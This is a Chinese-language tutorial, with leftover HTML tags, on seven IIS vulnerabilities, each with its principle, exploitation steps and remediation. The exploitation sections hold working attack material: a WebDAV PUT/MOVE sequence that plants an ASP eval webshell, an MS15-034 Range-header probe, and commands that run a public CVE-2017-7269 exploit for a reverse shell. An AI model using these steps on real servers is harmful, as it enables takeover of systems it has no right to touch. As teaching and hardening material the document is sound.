IIS常见漏洞与利用方式教学文档<\/strong><\/h1>
文档概述<\/strong><\/h2>
本文档旨在系统性地总结微软IIS (Internet Information Services) Web服务器中存在的常见安全漏洞、其利用原理、具体利用方法以及修复方案。内容基于提供的链接材料进行深度梳理与扩展，侧重于技术细节与实战指导。<\/p>
1. IIS 6.0 文件名解析漏洞<\/strong><\/h2>
漏洞原理<\/strong><\/h3>
IIS 6.0在处理文件路径时存在一个缺陷：当文件名中包含分号(;<\/code>)时，服务器会错误地将分号后的内容截断，仅使用分号前的部分作为文件扩展名来决定如何处理该文件。同时，IIS 6.0不仅将.asp<\/code>文件识别为可执行脚本，还会将扩展名.cer<\/code>、.cdx<\/code>、.asa<\/code>的文件也交由相同的动态链接库(asp.dll<\/code>)进行解析执行。<\/p>
利用方法<\/strong><\/h3> 文件上传<\/strong>：攻击者成功上传一个特制文件，例如名为 shell.asp;.jpg<\/code> 的文件。<\/li> 触发执行<\/strong>：直接访问上传文件的URL（如 http:\/\/target\/shell.asp;.jpg<\/code>）。<\/li> 漏洞触发<\/strong>：IIS 6.0 将 ;<\/code> 后的 .jpg<\/code> 截断，最终将 shell.asp<\/code> 识别为待执行的文件，从而将 JPG 文件中的 ASP 代码当作服务器脚本执行。<\/li> <\/ol> 修复方案<\/strong><\/h3> 严格限制上传<\/strong>：禁止上传包含特殊字符（如 ;<\/code>）的文件名。<\/li> 目录权限控制<\/strong>：将文件上传目录的权限设置为“无脚本执行”（Execute Permissions -> None 或 Pure Script）。<\/li> 升级迁移<\/strong>：升级到更高版本的IIS（如IIS 7.5+），该版本已修复此漏洞。<\/li> <\/ul> 2. IIS 6.0 目录解析漏洞<\/strong><\/h2> 漏洞原理<\/strong><\/h3> 此漏洞是文件名解析漏洞的变种。如果网站目录的名称以特定的扩展名结尾（如 .asp<\/code>, .asa<\/code>, .cer<\/code>, .cdx<\/code>），IIS 6.0 会错误地将该目录下的所有文件<\/strong>都当作对应的脚本文件来解析执行，无论该文件本身的真实扩展名是什么。<\/p> 利用方法<\/strong><\/h3> 创建恶意目录<\/strong>：利用任何方式（如Web应用漏洞）创建一个名为 evil.asp<\/code> 的文件夹。<\/li> 放置恶意文件<\/strong>：在该目录下上传一个内容为ASP代码的文本文件或图片文件，例如 shell.txt<\/code>。<\/li> 触发执行<\/strong>：访问 http:\/\/target\/evil.asp\/shell.txt<\/code>。<\/li> 漏洞触发<\/strong>：IIS 看到路径位于 evil.asp<\/code> 目录下，便会将 shell.txt<\/code> 的内容交给 asp.dll<\/code> 执行。<\/li> <\/ol> 修复方案<\/strong><\/h3> 禁用目录创建<\/strong>或严格监控目录命名规则，禁止创建以可疑扩展名结尾的文件夹。<\/li> 升级IIS版本<\/strong>。<\/li> <\/ul> 3. IIS 6.0 PUT文件上传漏洞<\/strong><\/h2> 漏洞原理<\/strong><\/h3> 此漏洞并非IIS本身的设计缺陷，而是不当配置<\/strong>的结果。需要满足两个条件：<\/p> 启用WebDAV<\/strong>：WebDAV (Web Distributed Authoring and Versioning) 扩展被启用，它提供了HTTP方法（如PUT）用于远程文件管理。<\/li> 目录写入权限<\/strong>：网站或特定目录被配置了“写入”权限。<\/li> <\/ol> 当两者同时具备时，攻击者可以直接使用HTTP的 PUT<\/code> 方法将文件上传到服务器。<\/p> 利用方法<\/strong><\/h3> 侦察<\/strong>：使用 OPTIONS<\/code> 方法探测服务器，检查返回头是否包含 DAV: 1, 2<\/code>，这表明WebDAV已启用。<\/li> 上传文件<\/strong>：使用 PUT<\/code> 请求上传一个内容为ASP木马的文本文件。 PUT<\/span> \/shell.txt HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target<\/span> <\/span><\/span>Content-Type:<\/span> text\/plain<\/span> <\/span><\/span>Content-Length:<\/span> 25<\/span> <\/span><\/span> <\/span><\/span><%eval<\/span> request("cmd")%><\/span> <\/span><\/span><\/code><\/pre><\/li> 重命名文件<\/strong>：由于 .txt<\/code> 文件不会被执行，需要利用WebDAV的 MOVE<\/code> 或 COPY<\/code> 方法将其重命名为 .asp<\/code> 文件。 MOVE \/shell.txt HTTP\/1.1 <\/span><\/span><\/span>Host: target <\/span><\/span><\/span>Destination: http:\/\/target\/shell.asp <\/span><\/span><\/span><\/code><\/pre><\/li> 获取WebShell<\/strong>：如果服务器返回 201 Created<\/code>，则表示重命名成功。随后即可使用中国菜刀等工具连接 shell.asp<\/code>，获取服务器控制权。<\/li> <\/ol> 修复方案<\/strong><\/h3> 禁用WebDAV<\/strong>：在“Web服务扩展”中禁用WebDAV。<\/li> 移除写入权限<\/strong>：除非绝对必要，否则永远不要为Web目录分配“写入”权限。<\/li> 使用授权规则<\/strong>：如果必须使用WebDAV，请配置严格的NTFS权限和IIS授权规则，只允许特定用户访问。<\/li> <\/ul> 4. IIS短文件名枚举漏洞<\/strong><\/h2> 漏洞原理<\/strong><\/h3> 为了兼容古老的MS-DOS 8.3文件名格式，NTFS文件系统会为长文件名自动生成一个对应的短文件名（例如 LongFileName.txt<\/code> 的短文件名可能为 LONGFI~1.TXT<\/code>）。IIS在接收到包含波浪号(~<\/code>)的URL请求时，会错误地披露该文件或目录是否存在。攻击者可以利用这种差异进行盲猜，枚举出服务器上的短文件名，从而推断出真实的长文件名，尤其是敏感文件（如 web.config<\/code> -> WEBCO~1.CON<\/code>）。<\/p> 利用方法<\/strong><\/h3> 盲注式探测<\/strong>：通过暴力猜解短文件名的前几个字符。如果请求 http:\/\/target\/longna~1.*\/.aspx<\/code> 返回 404<\/strong>，则表示存在以 longna<\/code> 开头的文件或目录。<\/li> 如果返回 400<\/strong>，则表示不存在。<\/li> <\/ul> <\/li> 自动化工具<\/strong>：使用自动化脚本或现有工具（如 IIS_shortname_Scanner<\/code>）来高效地枚举出存在的短文件名。<\/li> <\/ol> 修复方案<\/strong><\/h3> 升级.NET Framework<\/strong>：升级至 .NET Framework 4.0 或更高版本，可从根本上免疫此漏洞（IIS 7.5+ 默认集成）。<\/li> 禁用NTFS 8.3命名支持<\/strong>：打开注册表编辑器，找到键值：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem<\/code>。<\/li> 将 NtfsDisable8dot3NameCreation<\/code> 的值设置为 1<\/code>。<\/li> 注意<\/strong>：此操作仅阻止新文件生成短文件名，已存在的短文件名需要移动或复制后才能消失。<\/li> <\/ol> <\/li> 应用程序层过滤<\/strong>：在Web应用防火墙（WAF）或URL重写规则中过滤包含波浪号(~<\/code>)的请求。<\/li> <\/ul> 5. HTTP.sys远程代码执行漏洞 (MS15-034)<\/strong><\/h2> 漏洞原理<\/strong><\/h3> 该漏洞是Windows内核HTTP协议栈驱动程序 HTTP.sys<\/code> 中的一个整数溢出漏洞<\/strong>。攻击者通过发送一个特制的HTTP Range<\/code> 请求头，可以触发缓冲区溢出，最终在内核模式下执行任意代码，导致系统蓝屏崩溃（DoS）或完全控制服务器。<\/p> 利用方法<\/strong><\/h3> 漏洞检测<\/strong>：使用以下命令或浏览器插件修改请求头，发送恶意 Range<\/code> 头： curl -v http:\/\/target\/ -H "Host: irrelevant"<\/span> -H "Range: bytes=0-18446744073709551615"<\/span> <\/span><\/span><\/code><\/pre>如果服务器返回 416 Requested Range Not Satisfiable<\/strong>，则表明目标存在漏洞。如果返回其他代码（如400），则可能不受影响。<\/li> 漏洞利用<\/strong>：利用Metasploit等框架中的攻击模块，可以尝试实现远程代码执行（RCE）或直接进行拒绝服务攻击（DoS）。<\/li> <\/ol> 修复方案<\/strong><\/h3> 立即安装官方补丁<\/strong>：这是最根本的解决方案。微软已发布安全更新MS15-034。<\/li> 启用WAF防护<\/strong>：在补丁安装前，立即配置Web应用防火墙（WAF）规则，拦截包含恶意 Range<\/code> 头的请求。<\/li> <\/ul> 6. CVE-2017-7269 (IIS 6.0 WebDAV RCE)<\/strong><\/h2> 漏洞原理<\/strong><\/h3> 这是IIS 6.0的WebDAV组件中的一个缓冲区溢出漏洞<\/strong>。攻击者向服务器发送一个超长的、精心构造的 PROPFIND<\/code> 请求（WebDAV方法之一），由于程序对请求中的URL长度缺乏正确的边界检查，导致栈缓冲区溢出，从而覆盖函数返回地址，劫持程序执行流程。<\/p> 利用方法<\/strong><\/h3> 侦察<\/strong>：使用 OPTIONS<\/code> 方法确认WebDAV是否启用（响应头包含 DAV: 1, 2<\/code>）。<\/li> 利用漏洞<\/strong>：使用公开的EXP（漏洞利用代码），发送恶意 PROPFIND<\/code> 请求。 git clone https:\/\/github.com\/g0rx\/iis6-exploit-2017-CVE-2017-7269 <\/span><\/span>cd iis6-exploit-2017-CVE-2017-7269 <\/span><\/span>python exploit.py <Target IP> <Target Port> <Reverse Shell IP> <Reverse Shell Port> <\/span><\/span><\/code><\/pre><\/li> 获取Shell<\/strong>：成功利用后，攻击者会获得一个返连的Shell，具有与IIS工作进程相同的权限（通常是 NETWORK SERVICE<\/code>）。<\/li> <\/ol> 修复方案<\/strong><\/h3> 禁用WebDAV<\/strong>：这是最直接有效的临时缓解措施。<\/li> 安装补丁<\/strong>：微软为Windows Server 2003提供了补丁，应尽快安装。<\/li> 升级系统<\/strong>：Windows Server 2003早已停止支持，必须将系统升级到受支持的版本（如Windows Server 2016\/2019\/2022）。<\/li> <\/ul> 7. IIS 7.x 解析漏洞<\/strong><\/h2> 漏洞原理<\/strong><\/h3> 此漏洞与PHP的配置选项 cgi.fix_pathinfo<\/code> 密切相关。当该值设置为 1<\/code>（默认值）时，PHP CGI会尝试在文件路径中“修复” PATH_INFO<\/code> 信息。攻击者可以在任何一个已存在的文件（如图片、文本）后面加上 \/任意值.php<\/code>，PHP CGI会沿着路径向前寻找真实存在的文件，并将其内容以PHP代码的形式解析执行。<\/p> 利用方法<\/strong><\/h3> 上传恶意图片<\/strong>：上传一个包含PHP代码的图片文件（如 evil.jpg<\/code>），内容为 <?php phpinfo(); ?><\/code>。<\/li> 触发解析<\/strong>：访问 http:\/\/target\/evil.jpg\/index.php<\/code>。<\/li> 漏洞触发<\/strong>：IIS+PHP-CGI 看到请求的是 .php<\/code> 文件，但会向前寻找到 evil.jpg<\/code>，并将其中的 <?php phpinfo(); ?><\/code> 当作PHP代码执行。<\/li> <\/ol> 修复方案<\/strong><\/h3> 修改PHP配置<\/strong>：在 php.ini<\/code> 中将 cgi.fix_pathinfo<\/code> 的值设置为 0<\/code>，然后重启PHP-CGI进程。<\/li> 配置处理程序映射<\/strong>：在IIS管理器中，编辑 *.php<\/code> 的处理程序映射（Handler Mapping），点击“请求限制”，取消勾选“仅当请求映射至以下内容时才调用处理程序”选项，确保只有真正的 .php<\/code> 文件才会被交给PHP解析。<\/li> <\/ul> 总结与最佳实践<\/strong><\/h2> 漏洞名称<\/th> 影响版本<\/th> 关键点<\/th> 修复建议<\/th> <\/tr> <\/thead> 文件名解析<\/strong><\/td> IIS 6.0<\/td> 分号(;<\/code>)截断文件名解析<\/td> 严格控制上传，禁用目录执行权限，升级<\/td> <\/tr> 目录解析<\/strong><\/td> IIS 6.0<\/td> 特定扩展名目录下的文件被解析<\/td> 禁止创建此类目录，升级<\/td> <\/tr> PUT上传<\/strong><\/td> IIS 6.0<\/td> WebDAV启用 + 写入权限配置不当<\/td> 禁用WebDAV或严格授权，移除不必要的写入权限<\/td> <\/tr> 短文件名枚举<\/strong><\/td> 多数版本<\/td> NTFS 8.3格式名称信息披露<\/td> 升级.NET，禁用NTFS 8.3命名，过滤~<\/code><\/td> <\/tr> HTTP.sys RCE<\/strong><\/td> IIS 7.5+<\/td> 内核驱动整数溢出<\/td> 立即安装官方补丁<\/strong>，配置WAF<\/td> <\/tr> CVE-2017-7269<\/strong><\/td> IIS 6.0<\/td> WebDAV缓冲区溢出<\/td> 禁用WebDAV，安装补丁，升级操作系统<\/strong><\/td> <\/tr> IIS7.x解析<\/strong><\/td> IIS 7.x<\/td> cgi.fix_pathinfo=1<\/code> 路径处理缺陷<\/td> 设置 cgi.fix_pathinfo=0<\/code>，正确配置处理程序映射<\/td> <\/tr> <\/tbody> <\/table> 通用安全加固建议：<\/strong><\/p> 最小权限原则<\/strong>：始终以所需的最小权限运行IIS应用程序池和工作进程。<\/li> 及时更新<\/strong>：保持Windows操作系统和IIS版本处于最新状态，并安装所有安全更新。<\/li> 禁用不必要的功能<\/strong>：关闭不需要的IIS组件（如WebDAV、FTP）、HTTP方法（如PUT, DELETE）和服务扩展。<\/li> 纵深防御<\/strong>：在服务器前部署WAF，用于检测和拦截已知的攻击 payload。<\/li> <\/ol>

漏洞名称<\/th>	影响版本<\/th>	关键点<\/th>	修复建议<\/th> <\/tr> <\/thead>
文件名解析<\/strong><\/td>	IIS 6.0<\/td>	分号(`;<\/code>)截断文件名解析<\/td>`	严格控制上传，禁用目录执行权限，升级<\/td> <\/tr>
目录解析<\/strong><\/td>	IIS 6.0<\/td>	特定扩展名目录下的文件被解析<\/td>	禁止创建此类目录，升级<\/td> <\/tr>
PUT上传<\/strong><\/td>	IIS 6.0<\/td>	WebDAV启用 + 写入权限配置不当<\/td>	禁用WebDAV或严格授权，移除不必要的写入权限<\/td> <\/tr>
短文件名枚举<\/strong><\/td>	多数版本<\/td>	NTFS 8.3格式名称信息披露<\/td>	升级.NET，禁用NTFS 8.3命名，过滤`~<\/code><\/td> <\/tr>`
HTTP.sys RCE<\/strong><\/td>	IIS 7.5+<\/td>	内核驱动整数溢出<\/td>	立即安装官方补丁<\/strong>，配置WAF<\/td> <\/tr>
CVE-2017-7269<\/strong><\/td>	IIS 6.0<\/td>	WebDAV缓冲区溢出<\/td>	禁用WebDAV，安装补丁，升级操作系统<\/strong><\/td> <\/tr>
IIS7.x解析<\/strong><\/td>	IIS 7.x<\/td>	`cgi.fix_pathinfo=1<\/code> 路径处理缺陷<\/td>`	设置 cgi.fix_pathinfo=0<\/code>，正确配置处理程序映射<\/td> <\/tr> <\/tbody> <\/table> 通用安全加固建议：<\/strong><\/p> 最小权限原则<\/strong>：始终以所需的最小权限运行IIS应用程序池和工作进程。<\/li> 及时更新<\/strong>：保持Windows操作系统和IIS版本处于最新状态，并安装所有安全更新。<\/li> 禁用不必要的功能<\/strong>：关闭不需要的IIS组件（如WebDAV、FTP）、HTTP方法（如PUT, DELETE）和服务扩展。<\/li> 纵深防御<\/strong>：在服务器前部署WAF，用于检测和拦截已知的攻击 payload。<\/li> <\/ol>